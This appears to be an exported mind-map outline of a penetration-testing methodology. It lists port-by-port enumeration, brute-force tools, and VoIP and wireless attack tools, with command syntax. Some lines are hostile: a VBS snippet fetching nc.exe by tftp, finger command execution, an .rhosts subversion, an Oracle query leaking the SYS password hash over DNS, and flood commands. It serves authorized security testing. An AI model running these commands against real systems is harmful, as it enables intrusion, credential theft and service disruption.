Penetration Testing Framework 0.58

1. Manual Testing

1.1. Create Batch File (cmd.bat)

1.1.1. 1 cmd.exe

1.1.2. 2 echo off command echo on

1.2. Host Scripting File (cmd.vbs)

1.2.1. Option Explicit

1.2.2. Dim objShell

1.2.3. objShell.Run "%comspec% /k"

1.2.4. WScript.Quit

1.2.5. Alternative functionality:
    objShell.Run "%comspec% /k c: & dir"
    objShell.Run "%comspec% /k c: & cd temp & dir >temp.txt & notepad temp.txt"
    objShell.Run "%comspec% /k c: & tftp -i ip_address GET nc.exe" :-)

1.3. iKat

1.3.1. Integrated Kiosk Attack Tool: Reconnaissance, FileSystem Links, Common Dialogs, Application Handlers, Browser Plugins, iKAT Tools

1.4. AT Command - privilege escalation

1.4.1. AT HH:MM /interactive "cmd.exe"

1.4.2. AT HH:MM /interactive %comspec% /k

1.5. Keyboard Shortcuts/ Hotkeys

1.5.1. Ctrl + h – View History

1.5.2. Ctrl + n – New Browser

1.5.3. Shift + Left Click – New Browser

1.5.4. Ctrl + o – Internet Address (browse feature)

1.5.5. Ctrl + p – Print (to file)

1.5.6. Right Click (Shift + F10) – Save Image As, View Source

1.5.7. F1 – Jump to URL

1.5.8. SHIFT+F1: Local Task List

1.5.9. SHIFT+F2: Toggle Title Bar

1.5.10. SHIFT+F3: Close Remote Application

1.5.11. CTRL+F1: Displays Windows Security Desktop – Ctrl+Alt+Del

1.5.12. CTRL+F2: Remote Task List

1.5.13. CTRL+F3: Remote Task Manager – Ctrl+Shift+ESC

1.5.14. ALT+F2: Cycle through programs

1.5.15. ALT+PLUS: Alt+TAB

2. inurl:Citrix/AccessPlatform/auth/login.aspx

3. X11 port 6000^ open

3.1. X11 Enumeration

3.1.1. List open windows

3.1.2. Authentication Method: Xauth, Xhost

3.2. X11 Exploitation

3.2.1. xwd xwd -display -root -out

3.2.2. Keystrokes: Received, Transmitted

3.2.3. Screenshots

3.2.4. xhost +

3.3. Examine Configuration Files

3.3.1. /etc/Xn.hosts

3.3.2. /usr/lib/X11/xdm

3.3.3. /usr/lib/X11/xdm/xsession

3.3.4. /usr/lib/X11/xdm/xsession-remote

3.3.5. /usr/lib/X11/xdm/xsession.0

3.3.6. /usr/lib/X11/xdm/xdm-config (DisplayManager*authorize: on)

4. pwdump [-h][-o][-u][-p] machineName

5. Nabil contributed the AS/400 section.

6. Client Side Security

7. Back end files

7.1. .exe / .txt / .doc / .ppt / .pdf / .vbs / .pl / .sh / .bat / .sql / .xls / .mdb / .conf

8. Set objShell = CreateObject("WScript.Shell")

9. Check visible areas for sensitive information.

10. InitialProgram=c:\windows\system32\cmd.exe

11. Pre-Inspection Visit - template

12. Discovery & Probing. Enumeration can serve two distinct purposes in an assessment: OS fingerprinting, and identifying the remote applications being served. OS fingerprinting (TCP/IP stack fingerprinting) is the process of determining the operating system in use on a remote host by analysing the packets received from that host. There are two distinct ways to fingerprint an OS: actively (e.g. nmap) or passively (e.g. scanrand). Passive OS fingerprinting determines the remote OS from the packets received only and does not require any packets to be sent. Active OS fingerprinting is very noisy: it sends packets to the remote host and waits for a reply (or the lack of one). Different operating systems respond differently to certain types of packet (the response is governed by the relevant RFC plus any proprietary behaviour the vendor, notably Microsoft, has enabled within the system), so custom packets can be sent to tell them apart. The remote applications being served on a host can be determined from the open ports on that host; by port scanning it is then possible to build up a picture of what applications are running and tailor the test accordingly.

12.1. Default Port Lists

12.1.1. Windows

12.1.2. *nix

12.2. Enumeration tools and techniques - The vast majority can be used generically; however, certain bespoke applications require their own specific toolsets. Default passwords are platform and vendor specific.

12.2.1. General Enumeration Tools
    nmap
        nmap -n -A -PN -p- -T aggressive -iL nmap.targetlist -oX nmap.syn.results.xml
        nmap -sU -PN -v -O -p 1-30000 -T polite -iL nmap.targetlist > nmap.udp.results
        nmap -sV -PN -v -p 21,22,23,25,53,80,443,161 -iL nmap.targets > nmap.version.results
        nmap -A -sS -PN -n --script:all ip_address --reason
        grep "appears to be up" nmap_saved_filename | awk -F\( '{print $2}' | awk -F\) '{print $1}' > ip_list
    netcat
        nc -v -n IP_Address port
        nc -v -w 2 -z IP_Address port_range/port_number
    amap
        amap -bqv 80
        amap [-A|-B|-P|-W] [-1buSRHUdqv] [[-m] -o <file>] [-D <file>] [-t/-T sec] [-c cons] [-C retries] [-p proto] [-i <file>] [target port [port] ...]
    xprobe2
        xprobe2
    sinfp
        ./ -i -p
    nbtscan
        nbtscan [-v] [-d] [-e] [-l] [-t timeout] [-b bandwidth] [-r] [-q] [-s separator] [-m retransmits] (-f filename) | (<scan_range>)
    hping
        hping ip_address
    scanrand
        scanrand ip_address:all
    unicornscan
        unicornscan [options `b:B:d:De:EFhi:L:m:M:pP:q:r:R:s:St:T:w:W:vVZ:' ] IP_ADDRESS/CIDR_NET_MASK:S-E
    netenum
        netenum network/netmask timeout
    fping
        fping -a -d hostname/(Network/Subnet_Mask)

12.2.2. Firewall Specific Tools
    firewalk
        firewalk -p [protocol] -d [destination_port] -s [source_port] [internal_IP] [gateway_IP]
    ftester
        host 1: ./ftestd -i eth0 -v
        host 2: ./ftest -f ftest.conf -v -d 0.01
        then: ./freport ftest.log ftestd.log

12.2.3. Default Passwords (examine lists): Passwords A to Z, Passwords (Numeric)

12.3. Active Hosts

12.3.1. Open TCP Ports

12.3.2. Closed TCP Ports

12.3.3. Open UDP Ports

12.3.4. Closed UDP Ports

12.3.5. Service Probing: SMTP Mail Bouncing; Banner Grabbing (HTTP, HTTPS, SMTP, POP3, FTP, other)

12.3.6. ICMP Responses: Type 3 (Port Unreachable), Type 8 (Echo Request), Type 13 (Timestamp Request), Type 15 (Information Request), Type 17 (Subnet Address Mask Request), responses from broadcast address

12.3.7. Source Port Scans: TCP/UDP 53 (DNS), TCP 20 (FTP Data), TCP 80 (HTTP), TCP/UDP 88 (Kerberos)

12.3.8. Firewall Assessment: Firewalk, TCP/UDP/ICMP responses

12.3.9. OS Fingerprint

13. Enumeration

13.1. Daytime port 13 open

13.1.1. nmap nse script daytime

13.2. FTP port 21 open

13.2.1. Fingerprint server
    telnet ip_address 21 (banner grab)
    Run command: ftp ip_address [email protected]
    Check for anonymous access: ftp ip_address
        Username: anonymous OR anon
        Password: [email protected]

13.2.2. Password guessing: Hydra brute force, medusa, Brutus

13.2.3. Examine configuration files: ftpusers, ftp.conf, proftpd.conf

13.2.4. MiTM

13.3. SSH port 22 open

13.3.1. Fingerprint server
    telnet ip_address 22 (banner grab)
    scanssh: scanssh -p -r -e excludes random(no.)/Network_ID/Subnet_Mask

13.3.2. Password guessing
    ssh root@ip_address
    guess-who: ./b -l username -h ip_address -p 22 -2 < password_file_location
    Hydra brute force
    brutessh
    Ruby SSH Bruteforcer

13.3.3. Examine configuration files: ssh_config, sshd_config, authorized_keys, ssh_known_hosts, .shosts

13.3.4. SSH client programs: tunnelier, winsshd, putty, winscp

13.4. Telnet port 23 open

13.4.1. Fingerprint server
    telnet ip_address
    Common Banner List (OS / Banner)
        Solaris 8 / SunOS 5.8
        Solaris 2.6 / SunOS 5.6
        Solaris 2.4 or 2.5.1 / Unix(r) System V Release 4.0 (hostname)
        SunOS 4.1.x / SunOS Unix (hostname)
        FreeBSD / FreeBSD/i386 (hostname) (ttyp1)
        NetBSD / NetBSD/i386 (hostname) (ttyp1)
        OpenBSD / OpenBSD/i386 (hostname) (ttyp1)
        Red Hat 8.0 / Red Hat Linux release 8.0 (Psyche)
        Debian 3.0 / Debian GNU/Linux 3.0 hostname
        SGI IRIX 6.x / IRIX (hostname)
        IBM AIX 4.1.x / AIX Version 4 (C) Copyrights by IBM and by others 1982, 1994.
        IBM AIX 4.2.x or 4.3.x / AIX Version 4 (C) Copyrights by IBM and by others 1982, 1996.
        Nokia IPSO / IPSO (hostname) (ttyp0)
        Cisco IOS / User Access Verification
        Livingston ComOS / ComOS - Livingston PortMaster
    telnetfp

13.4.2. Password Attack: Brutus, Hydra brute force, telnet -l "-froot" hostname (Solaris 10+)

13.4.3. Examine configuration files: /etc/xinetd.d/telnet, /etc/xinetd.d/stelnet

13.5. Sendmail Port 25 open

13.5.1. Fingerprint server telnet ip_address 25 (banner grab)

13.5.2. Mail Server Testing
    Enumerate users
        VRFY username (verifies if username exists - enumeration of accounts)
        EXPN username (verifies if username is valid - enumeration of accounts)
    Mail Spoof Test
        HELO anything
        MAIL FROM: spoofed_address
        RCPT TO: valid_mail_account
        DATA
        .
        QUIT
    /etc/inetd.conf
    Mail Relay Test

13.5.3. Examine Configuration Files

13.6. DNS port 53 open

13.6.1. Fingerprint server/service
    host
        host [-aCdlnrTwv] [-c class] [-N ndots] [-R number] [-t type] [-W wait] name [server]
        -v verbose format
        -t (query type) allows a user to specify a record type i.e. A, NS, or PTR
        -a same as -t ANY
        -l zone transfer (if allowed)
        -f save to a specified filename
    nslookup
        nslookup [-option ...] [host-to-find | - [server]]
    dig
        dig [@server] [-b address] [-c class] [-f filename] [-k filename] [-p port#] [-t type] [-x addr] [-y name:key] [-4] [-6] [name] [type] [class] [queryopt...]
    whois
        -h use the named host to resolve the query
        -a use ARIN to resolve the query
        -r use RIPE to resolve the query
        -p use APNIC to resolve the query
        -Q perform a quick lookup

13.6.2. DNS Enumeration
    Bile Suite
        perl [website] [project_name]
        perl [website] [input file]
        perl [input file] [true domain file] [output file] <range>
        perl [input file] [true domain file] [output file]
        perl [input file] [output file]
        perl jarf-dnsbrute [domain_name] (brutelevel) [file_with_names]
        perl jarf-rev [subnetblock] [nameserver]
    txdns
        txdns -rt -t domain_name
        txdns -x 50 -bb domain_name
    nmap nse scripts: dns-random-srcport, dns-random-txid, dns-recursion, dns-zone-transfer

13.6.3. Examine Configuration Files: host.conf, resolv.conf, named.conf

13.7. perl [ip_address_file] [output_file]

13.8. TFTP port 69 open

13.8.1. TFTP Enumeration
    tftp ip_address PUT local_file
    tftp ip_address GET conf.txt (or other files)
    Solarwinds TFTP server
    tftp -i <IP> GET /etc/passwd (old Solaris)

13.8.2. TFTP Bruteforcing: TFTP bruteforcer, Cisco-Torch

13.9. Finger Port 79 open

13.9.1. User enumeration
    finger 'a b c d e f g h'
    finger [email protected]
    finger [email protected]
    finger [email protected]
    finger [email protected]
    finger **
    finger [email protected]
    finger
    nmap nse script finger

13.9.2. Command execution: finger "|/bin/[email protected]", finger "|/bin/ls -a /"

13.9.3. Finger Bounce: finger user@host@victim, finger @internal@external

13.10. Web Ports 80,8080 etc. open

13.10.1. Fingerprint server: Telnet ip_address port; Firefox plugins (All, Specific)

13.10.2. Crawl website
    lynx [options] startfile/URL (options include -traversal -crawl -dump -image_links -source)
    httprint
    Metagoofil: -d [domain] -l [no. of] -f [type] -o results.html

13.10.3. Web Directory enumeration: Nikto (nikto [-h target] [options]), DirBuster, Wikto, Goolag Scanner

13.10.4. Vulnerability Assessment
    Manual Tests: Default Passwords, Install Backdoors, Method Testing, Upload Files, View Page Source, Input Validation Checks, Automated table and column iteration
    Vulnerability Scanners: Acunetix, Grendelscan, NStealth, Obiwan III, w3af
    Specific Applications/Server Tools: Domino, Joomla, Vbulletin, ZyXel

13.10.5. Proxy Testing: Burpsuite, Crowbar, Interceptor, Paros, Requester Raw, Suru, WebScarab

13.10.6. Examine configuration files
    Generic: examine httpd.conf / windows config files
    JBoss: JMX Console http://<IP>:8080/jmx-console/
    Joomla: configuration.php, diagnostics.php
    Mambo: configuration.php
    Wordpress: setup-config.php, wp-config.php
    ZyXel
        /WAN.html (contains PPPoE ISP password)
        /WLAN_General.html and /WLAN.html (contains WEP key)
        /rpDyDNS.html (contains DDNS credentials)
        /Firewall_DefPolicy.html (Firewall)
        /CF_Keyword.html (Content Filter)
        /RemMagWWW.html (Remote MGMT)
        /rpSysAdmin.html (System)
        /LAN_IP.html (LAN)
        /NAT_General.html (NAT)
        /ViewLog.html (Logs)
        /rpFWUpload.html (Tools)
        /DiagGeneral.html (Diagnostic)
        /RemMagSNMP.html (SNMP Passwords)
        /LAN_ClientList.html (Current DHCP Leases)
    Config Backups

13.10.7. Examine web server logs
    c:\winnt\system32\Logfiles\W3SVC1
    awk -F " " '{print $3,$11}' filename | sort | uniq

13.10.8. References
    White Papers: Cross Site Request Forgery: An Introduction to a Common Web Application Weakness; Attacking Web Service Security: Message Oriented Madness, XML Worms and Web Service Security Sanity; Blind Security Testing - An Evolutionary Approach; Command Injection in XML Signatures and Encryption; Input Validation Cheat Sheet; SQL Injection Cheat Sheet
    Books: Hacking Exposed Web 2.0; Hacking Exposed Web Applications; The Web Application Hacker's Handbook

13.10.9. Exploit Frameworks / Brute-force Tools: Acunetix, Metasploit, w3af

13.11. Portmapper port 111 open

13.11.1. username:password@IP_Address port/protocol (i.e. 80/HTTP)

13.11.2. rpcinfo: rpcinfo [options] IP_Address

13.12. NTP Port 123 open

13.12.1. NTP Enumeration
    ntpdc -c monlist IP_ADDRESS
    ntpdc -c sysinfo IP_ADDRESS
    ntpq: host hostname, ntpversion, readlist, version

13.12.2. Examine configuration files: ntp.conf

13.12.3. nmap nse script ntp-info

13.13. NetBIOS Ports 135-139,445 open

13.13.1. NetBIOS enumeration
    Enum: enum <-UMNSPGLdc> <-u username> <-p password> <-f dictfile> <hostname|ip>
    Null Session: net use \\<IP>\ipc$ "" /u:""
    Smbclient: smbclient -L //server/share password options
    Superscan: Enumeration tab
    user2sid/sid2user
    Winfo

13.13.2. NetBIOS brute force: Hydra, Brutus, Cain & Abel, getacct, NAT (NetBIOS Auditing Tool)

13.13.3. Examine Configuration Files: smb.conf, lmhosts

13.14. SNMP port 161 open

13.14.1. Default Community Strings: public, private, cisco, cable-docsis, ILMI

13.14.2. MIB enumeration
    Windows NT: hostnames, domain name, usernames, running services, share information
    Solarwinds MIB walk
    Getif
    snmpwalk: snmpwalk -v <Version> -c <Community string> <IP>
    Snscan
    Applications: ZyXel
    nmap nse script snmp-sysdescr

13.14.3. SNMP Bruteforce
    onesixtyone: onesixtyone -c SNMP.wordlist <IP>
    cat: ./cat -h <IP> -w SNMP.wordlist
    Solarwinds SNMP Brute Force
    ADMsnmp
    nmap nse script snmp-brute

13.14.4. Examine SNMP Configuration files: snmp.conf, snmpd.conf, snmp-config.xml

13.15. LDAP Port 389 Open

13.15.1. ldap enumeration
    ldapminer: ldapminer -h ip_address -p port (not required if default) -d
    luma: GUI based tool
    ldp: GUI based tool
    openldap
        ldapsearch [-n] [-u] [-v] [-k] [-K] [-t] [-A] [-L[L[L]]] [-M[M]] [-d debuglevel] [-f file] [-D binddn] [-W] [-w passwd] [-y passwdfile] [-H ldapuri] [-h ldaphost] [-p ldapport] [-P 2|3] [-b searchbase] [-s base|one|sub] [-a never|always|search|find] [-l timelimit] [-z sizelimit] [-O security-properties] [-I] [-U authcid] [-R realm] [-x] [-X authzid] [-Y mech] [-Z[Z]] filter [attrs...]
        ldapadd [-c][-S file][-n][-v][-k][-K][-M[M]][-d debuglevel][-D binddn][-W][-w passwd][-y passwdfile][-h ldaphost][-p ldap-port][-P 2|3][-O security-properties][-I][-Q][-U authcid][-R realm][-x][-X authzid][-Y mech][-Z[Z]][-f file]
        ldapdelete [-n][-v][-k][-K][-c][-M[M]][-d debuglevel][-f file][-D binddn][-W][-w passwd][-y passwdfile][-H ldapuri][-h ldaphost][-P 2|3][-p ldapport][-O security-properties][-U authcid][-R realm][-x][-I][-Q] [-X authzid][-Y mech][-Z[Z]][dn]
        ldapmodify [-a][-c][-S file][-n][-v][-k][-K][-M[M]][-d debuglevel][-D binddn][-W][-w passwd][-y passwdfile][-H ldapuri][-h ldaphost][-p ldapport][-P 2|3][-O security-properties][-I][-Q][-U authcid][-R realm][-x][-X authzid][-Y mech][-Z[Z]][-f file]
        ldapmodrdn [-r][-n][-v][-k][-K][-c][-M[M]][-d debuglevel][-D binddn][-W][-w passwd][-y passwdfile] [-H ldapuri][-h ldaphost][-p ldapport][-P 2|3][-O security-properties][-I][-Q][-U authcid][-R realm][-x] [-X authzid][-Y mech][-Z[Z]][-f file][dn rdn]

13.15.2. ldap brute force
    bf_ldap: bf_ldap -s server -d domain name -u|-U username | users list file name -L|-l passwords list | length of passwords to generate
        optional: -p port (default 389), -v (verbose mode), -P Ldap user path (default ,CN=Users,)
    K0ldS

13.15.3. Examine Configuration Files
    General: containers.ldif, ldap.cfg, ldap.conf, ldap.xml, ldap-config.xml, ldap-realm.xml, slapd.conf
    IBM SecureWay V3 server
    Microsoft Active Directory server: msadClassesAttrs.ldif
    Netscape Directory Server 4: nsslapd.sas_at.conf, nsslapd.sas_oc.conf
    OpenLDAP directory server: slapd.sas_at.conf, slapd.sas_oc.conf
    Sun ONE Directory Server 5.1: 75sas.ldif

13.16. PPTP/L2TP/VPN port 500/1723 open

13.16.1. Enumeration: ike-scan, ike-probe

13.16.2. Brute-Force: ike-crack

13.16.3. Reference Material: PSK cracking paper; SecurityFocus Infocus - Scanning a VPN Implementation

13.17. Modbus port 502 open

13.17.1. modscan

13.18. rlogin port 513 open

13.18.1. Rlogin Enumeration
    Find the files: find / -name .rhosts; locate .rhosts
    Examine files: cat .rhosts
    Manual login: rlogin hostname -l username; rlogin <IP>
    Subvert the files: echo ++ > .rhosts

13.18.2. Rlogin Brute force: Hydra

13.19. rsh port 514 open

13.19.1. Rsh Enumeration: rsh host [-l username] [-n] [-d] [-k realm] [-f | -F] [-x] [-PN | -PO] command

13.19.2. Rsh Brute Force: rsh-grind, Hydra, medusa

13.20. SQL Server Port 1433 1434 open

13.20.1. SQL Enumeration: piggy; SQLPing (sqlping ip_address/hostname); SQLPing2; SQLPing3; SQLpoke; SQL Recon; SQLver

13.20.2. SQL Brute Force
    SQLPAT
        sqlbf -u hashes.txt -d dictionary.dic -r out.rep (dictionary attack)
        sqlbf -u hashes.txt -c -r out.rep (brute-force attack)
    SQL Dict
    SQLAT
    Hydra
    SQLlhf
    ForceSQL

13.21. Citrix port 1494 open

13.21.1. Citrix Enumeration
    Default Domain
    Published Applications: ./citrix-pa-scan {IP_address/file | - | random} [timeout]
    IP_to_proxy_to [Local_IP]

13.21.2. Citrix Brute Force
    bforce.js
    connect.js
    Citrix Brute-forcer
    Reference Material: Hacking Citrix - the legitimate backdoor; Hacking Citrix - the forceful way

13.22. Oracle Port 1521 Open

13.22.1. Oracle Enumeration
    oracsec
    Repscan
    Sidguess
    Scuba
    DNS/HTTP Enumeration
        SQL> SELECT UTL_INADDR.GET_HOST_ADDRESS((SELECT PASSWORD FROM DBA_USERS WHERE USERNAME='SYS')||'') FROM DUAL;
    WinSID
    Oracle default password list
    TNSVer: tnsver host [port]
    TCP Scan
    Oracle TNSLSNR will respond to: [ping] [version] [status] [service] [change_password] [help] [reload] [save_config] [set log_directory] [set display_mode] [set log_file] [show] [spawn] [stop]
    TNSCmd
        perl -h ip_address
        perl version -h ip_address
        perl status -h ip_address
        perl -h ip_address --cmdsize (40 - 200)
    LSNrCheck
    Oracle Security Check (needs credentials)
    OAT
        sh -s ip_address
        opwg.bat -s ip_address
        sh -s ip_address -u username -p password -d SID
        OR c:\oquery -s ip_address -u username -p password -d SID
    OScanner
        sh -s ip_address
        oscanner.exe -s ip_address
        sh oscanner_saved_file.xml
        reportviewer.exe oscanner_saved_file.xml
    NGS Squirrel for Oracle
    Service Register: Service-register.exe ip_address
    PLSQL Scanner 2008

13.22.2. Oracle Brute Force
    OAK
        ora-getsid hostname port sid_dictionary_list
        ora-auth-alter-session host port sid username password sql
        ora-brutesid host port start
        ora-pwdbrute host port sid username password-file
        ora-userenum host port sid userlistfile
        ora-ver -e (-f -l -a) host port
    breakable (targets Application Server port)
        breakable.exe host url [port] [v]
            host: ip_address of the Oracle Portal Server
            url: PATH_INFO i.e. /pls/orasso
            port: TCP port the Oracle Portal Server is serving pages from
            v: verbose
    SQLInjector (targets Application Server port)
        sqlinjector -t ip_address -a database -f query.txt -p 80 -gc 200 -ec 500 -k NGS SOFTWARE -gt SQUIRREL
        sqlinjector.exe -t ip_address -p 7777 -a where -gc 200 -ec 404 -qf q.txt -f plsql.txt -s oracle
    Check Password
        orabf: orabf [hash]:[username] [options]
        thc-orakel: Cracker, Client, Crypto
    DBVisualisor: SQL scripts from manual SQL input of previously reported vulnerabilities

13.22.3. Oracle Reference Material: Understanding SQL Injection; SQL Injection walkthrough; SQL Injection by example; Advanced SQL Injection in Oracle databases; Blind SQL Injection; SQL Cheatsheets

13.23. NFS Port 2049 open

13.23.1. NFS Enumeration
    showmount -e hostname/ip_address
    mount -t nfs ip_address:/directory_found_exported /local_mount_point

13.23.2. NFS Brute Force: interact with the NFS share and try to add/delete; Exploit and Confuse Unix

13.23.3. Examine Configuration Files: /etc/exports, /etc/lib/nfs/xtab

13.23.4. nmap nse script nfs-showmount

13.24. Compaq/HP Insight Manager Port 2301, 2381 open

13.24.1. HP Enumeration: Authentication Method (Host OS Authentication, Default Authentication); Wikto; Nstealth

13.24.2. HP Bruteforce: Hydra, Acunetix

13.24.3. Examine Configuration Files: mx.log, CLIClientConfig.cfg, database.props, pg_hba.conf, jboss-service.xml, .namazurc

13.25. MySQL port 3306 open

13.25.1. Enumeration
    nmap -A -n -p3306 <IP Address>
    nmap -A -n -PN --script:ALL -p3306 <IP Address>
    telnet IP_Address 3306
    use test; select * from test;
    To check for other DBs: show databases

13.25.2. Administration: MySQL Network Scanner, MySQL GUI Tools, mysqlshow, mysqlbinlog

13.25.3. Manual Checks
    Default usernames and passwords: username root, password testing
    Configuration Files
    Operating System
    Command History
    Log Files
    To run many SQL commands at once: mysql -u username -p < manycommands.sql
    MySQL data directory (location specified in my.cnf)
    SSL Check
    Privilege Escalation: current level of access; access passwords; create a new user and grant him privileges; break into a shell

13.25.4. SQL injection http://target/ expected_string database

13.25.5. References. Design Weaknesses: MySQL running as root; exposed publicly on the Internet

13.26. RDesktop port 3389 open

13.26.1. Rdesktop Enumeration Remote Desktop Connection

13.26.2. Rdesktop Bruteforce: TSGrinder (tsgrinder.exe -w dictionary_file -l leet -d workgroup -u administrator -b -n 2 IP_Address), Tscrack

13.27. Sybase Port 5000+ open

13.27.1. Sybase Enumeration: sybase-version ip_address (from NGS)

13.27.2. Sybase Vulnerability Assessment: use DBVisualiser; Sybase Security checksheet; manual SQL input of previously reported vulnerabilities; NGS Squirrel for Sybase

13.28. SIP Port 5060 open

13.28.1. SIP Enumeration
    netcat: nc IP_Address Port
    sipflanker: python 192.168.1-254
    Sipscan
    smap
        smap IP_Address/Subnet_Mask
        smap -o IP_Address/Subnet_Mask
        smap -l IP_Address

13.28.2. SIP Packet Crafting etc.
    sipsak
        Tracing paths: sipsak -T -s sip:username@domain
        Options request: sipsak -vv -s sip:username@domain
        Query registered bindings: sipsak -I -C empty -a password -s sip:username@domain
    siprogue

13.28.3. SIP Vulnerability Scanning/Brute Force
    tftp bruteforcer (default dictionary file): ./ IP_Address Dictionary_file Maximum_Processes
    VoIPaudit
    SiVuS

13.28.4. Examine Configuration Files: SIPDefault.cnf, asterisk.conf, sip.conf, phone.conf, sip_notify.conf, <Ethernet address>.cfg, 000000000000.cfg, phone1.cfg, sip.cfg, etc.

13.29. VNC port 5900^ open

13.29.1. VNC Enumeration: scan 5900^ for direct access, 5800 for HTTP access.

13.29.2. VNC Brute Force: Password Attacks (Remote, Local)

13.29.3. Examine Configuration Files: .vnc, /etc/vnc/config, $HOME/.vnc/config, /etc/sysconfig/vncservers, /etc/vnc.conf

13.30. Tor Port 9001, 9030 open

13.30.1. Tor Node Checker Ip Pages

13.30.2. nmap NSE script

13.31. Jet Direct 9100 open

13.31.1. hijetta

14. VoIP Security

14.1. Sniffing Tools

14.1.1. AuthTool

14.1.2. Cain & Abel

14.1.3. Etherpeek

14.1.4. NetDude

14.1.5. Oreka

14.1.6. PSIPDump

14.1.7. SIPomatic

14.1.8. SIPv6 Analyzer

14.1.9. UCSniff

14.1.10. VoiPong

14.1.11. VOMIT

14.1.12. Wireshark

14.1.13. WIST - Web Interface for SIP Trace

14.2. Scanning and Enumeration Tools

14.2.1. enumIAX

14.2.2. fping

14.2.3. IAX Enumerator

14.2.4. iWar

14.2.5. Nessus

14.2.6. Nmap

14.2.7. SIP Forum Test Framework (SFTF)

14.2.8. SIPcrack

14.2.9. sipflanker: python 192.168.1-254

14.2.10. SIP-Scan

14.2.11. SIP.Tastic

14.2.12. SIPVicious

14.2.13. SiVuS

14.2.14. SMAP
    smap IP_Address/Subnet_Mask
    smap -o IP_Address/Subnet_Mask
    smap -l IP_Address

14.2.15. snmpwalk

14.2.16. VLANping

14.2.17. VoIPAudit

14.2.18. VoIP GHDB Entries

14.2.19. VoIP Voicemail Database

14.3. Packet Creation and Flooding Tools

14.3.1. H.323 Injection Files

14.3.2. H225regreject

14.3.3. IAXHangup

14.3.4. IAXAuthJack

14.3.5. IAX.Brute

14.3.6. IAXFlooder ./iaxflood sourcename destinationname numpackets

14.3.7. INVITE Flooder ./inviteflood interface target_user target_domain ip_address_target no_of_packets

14.3.8. kphone-ddos

14.3.9. RTP Flooder

14.3.10. rtpbreak

14.3.11. Scapy

14.3.12. Seagull

14.3.13. SIPBomber

14.3.14. SIPNess

14.3.15. SIPp

14.3.16. SIPsak
    Tracing paths: sipsak -T -s sip:username@domain
    Options request: sipsak -vv -s sip:username@domain
    Query registered bindings: sipsak -I -C empty -a password -s sip:username@domain

14.3.17. SIP-Send-Fun

14.3.18. SIPVicious

14.3.19. Spitter

14.3.20. TFTP Brute Force perl <tftpserver> <filelist> <maxprocesses>

14.3.21. UDP Flooder ./udpflood source_ip target_destination_ip src_port dest_port no_of_packets

14.3.22. UDP Flooder (with VLAN Support) ./udpflood source_ip target_destination_ip src_port dest_port TOS user_priority VLAN ID no_of_packets

14.3.23. Voiphopper

14.4. Fuzzing Tools

14.4.1. Asteroid

14.4.2. Codenomicon VoIP Fuzzers

14.4.3. Fuzzy Packet

14.4.4. Mu Security VoIP Fuzzing Platform

14.4.5. ohrwurm RTP Fuzzer

14.4.6. PROTOS H.323 Fuzzer

14.4.7. PROTOS SIP Fuzzer

14.4.8. SIP Forum Test Framework (SFTF)

14.4.9. Sip-Proxy

14.5. Signaling Manipulation Tools

14.5.1. AuthTool ./authtool captured_sip_msgs_file -d dictionary -r usernames_passwords -v

14.5.2. BYE Teardown

14.5.3. Check Sync Phone Rebooter

14.5.4. RedirectPoison

14.5.5. Registration Adder

14.5.6. Registration Eraser

14.5.7. Registration Hijacker

14.5.8. SIP-Kill

14.5.9. SIP-Proxy-Kill

14.5.10. SIP-RedirectRTP

14.5.11. vnak

14.6. Media Manipulation Tools

14.6.1. RTP InsertSound ./rtpinsertsound interface source_rtp_ip source_rtp_port destination_rtp_ip destination_rtp_port file

14.6.2. RTP MixSound ./rtpmixsound interface source_rtp_ip source_rtp_port destination_rtp_ip destination_rtp_port file

14.6.3. RTPProxy

14.6.4. RTPInject

14.7. Generic Software Suites

14.7.1. OAT Office Communication Server Tool Assessment

14.7.2. EnableSecurity VOIPPACK (Note: add-on for Immunity Canvas)

14.8. References

14.8.1. URLs: Common Vulnerabilities and Exploits (CVE) - vulnerabilities and exploit information relating to these products can be found here; Default Passwords; Hacking Exposed VoIP Tool Pre-requisites; VoIPsa

14.8.2. White Papers: An Analysis of Security Threats and Tools in SIP-Based VoIP Systems; An Analysis of VoIP Security Threats and Tools; Hacking VoIP Exposed; Security testing of SIP implementations; SIP Stack Fingerprinting and Stack Difference Attacks; Two attacks against VoIP; VoIP Attacks!; VoIP Security Audit Program (VSAP)

14.8.3. Spirent ThreatEx

15. Wireless Penetration

15.1. Wireless Assessment. The following information should ideally be obtained/enumerated when carrying out a wireless assessment. All of it is needed to give the tester (and hence the customer) a clear and concise picture of the network being assessed. A brief overview of the network during a pre-site meeting with the customer should allow you to estimate the timescales required to carry out the assessment.

15.1.1. Site Map: RF Map (Lines of Sight, Signal Coverage); Physical Map (Triangulate APs, Satellite Imagery)

15.1.2. Network Map
    MAC Filter: Authorised MAC Addresses, Reaction to Spoofed MAC Addresses
    Encryption Keys utilised: WEP, WPA/PSK, 802.1x
    Access Points: ESSID, BSSIDs
    Wireless Clients: MAC Addresses, Intercepted Traffic

15.2. SipRogue

15.3. ./redirectpoison interface target_source_ip target_source_port "<contact_information i.e. sip:;line=xtrfgy>"

15.4. Wireless Toolkit

15.4.1. Wireless Discovery: Aerosol, Airfart, Aphopper, Apradar, BAFFLE, inSSIDer, iWEPPro, karma, KisMAC-ng, Kismet, MiniStumbler, Netstumbler, Vistumbler, Wellenreiter, Wifi Hopper, WirelessMon, WiFiFoFum

15.4.2. Packet Capture: Airopeek, Airpcap, Airtraf, Apsniff, Cain, Commview, Ettercap, Netmon, nmwifi, Wireshark

15.4.3. EAP Attack tools: eapmd5pass (eapmd5pass -w dictionary_file -r eapmd5-capture.dump)

15.4.4. LEAP Attack Tools: asleap, thc leap cracker, anwrap

15.4.5. WEP/WPA Password Attack Tools: Airbase, Aircrack-ptw, Aircrack-ng, Airsnort, cowpatty, FiOS Wireless Key Calculator, iWifiHack, KisMAC-ng, Rainbow Tables, wep attack, wep crack, wzcook

15.4.6. Frame Generation Software: Airgobbler, airpwn, Airsnarf, Commview, fake ap, void 11, wifi tap (wifitap -b <BSSID> [-o <iface>] [-i <iface> [-p]] [-w <WEP key> [-k <key id>]] [-d [-v]] [-h]), FreeRADIUS - Wireless Pwnage Edition

15.4.7. Mapping Software: Online Mapping (WIGLE, Skyhook); Tools (Knsgem)

15.4.8. File Format Conversion Tools: ns1 recovery and conversion tool; warbable; warkizniz (warkizniz04b.exe [kismet.csv] [kismet.gps] [ns1 filename]); ivstools

15.4.9. IDS Tools: WIDZ, War Scanner, Snort-Wireless, AirDefense, AirMagnet

15.5. WLAN discovery

15.5.1. Unencrypted WLAN: Visible SSID - sniff for IP range; Hidden SSID - deauth client

